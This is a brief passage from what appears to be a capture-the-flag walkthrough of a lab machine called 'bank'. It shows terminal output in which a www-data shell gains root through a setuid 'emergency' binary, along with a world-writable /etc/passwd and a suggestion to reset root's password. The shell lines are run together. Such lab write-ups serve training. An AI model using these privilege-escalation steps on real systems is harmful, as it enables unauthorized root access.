www-data@bank:/var/www/bank/uploads$ var/htb/bin/emergency whoami;id root uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# /etc/passwd is writable www-data@bank:/var/www/bank/uploads$ ls -la /etc/passwd -rw-rw-rw- 1 root root 1252 May 28 2017 /etc/passwd # we can change password for root; # su - root
Last updated 3 years ago